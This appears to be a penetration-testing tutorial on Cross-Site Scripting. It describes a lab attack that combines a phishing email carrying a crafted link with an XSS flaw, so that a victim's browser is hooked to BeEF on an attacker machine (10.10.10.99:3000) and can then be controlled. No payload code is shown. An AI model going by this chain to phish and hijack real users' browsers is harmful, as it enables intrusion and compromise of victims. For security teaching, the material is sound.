This exploit tutorial will give a brief overview of Cross-Site Scripting (XSS), and how to leverage it to control a victim’s browser. XSS is a very common web application vulnerability that many dismiss as low risk because they don’t understand what’s possible.an be used in a very subtle way to pivot into a company’s internal network by abusing a victim’s hooked browse.
Normally XSS targets a victim’s browser through the web application. So when a user visits the page, the attacker gets to run their code in the user’s browser.
Cross Site Scripting Using BEEF
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
The Attack Process
The Attack Process
This attack has an Attacker and a Victim.
The Attacker will craft a Phishing email to exploit an internal cross site scripting vulnerability.
Once exploited the Attacker can fully compromise the victim’s machines and carry out commands against that machine.
This is to prove that Cross Site Scripting is a major issue not only for the Applications themselves but for the Users that are using them.
Find a vulnerable Web Application to Cross-Site Scripting.
For example the vulnerable parameters are:
- Last Name
Phishing Email Crafted and sent to victim. Within this email the Sign up Here contains a crafted URL which you can see at the bottom of below image and better in Image further down.
This will take advantage of the Cross-Site Scripting Vulnerability.
Victim receives the email and clicks the link, now the connection is made from the victim’s machine back to the attackers without the victim knowing.
Now the Victims browser is hooked to the IP of the Attackers matching which is 10.10.10.99 on port 3000.
Once the Attacker has made this connection by exploiting the Cross-Site Scripting through a Phishing attack BEEF allows the attacker to send commands to the Victim.
As we can see the IP Address for the Attackers Machine is 10.10.10.99.
As we can see the IP Address for the Victims Machine is 10.10.10.97.
The below image is the Victims machine on 10.10.10.97 is now connected to the BEEF framework running on the Attackers machine 10.10.10.99.
Once the BeEF hook is loaded in the browser you can check your BeEF controller to control the victim’s browser: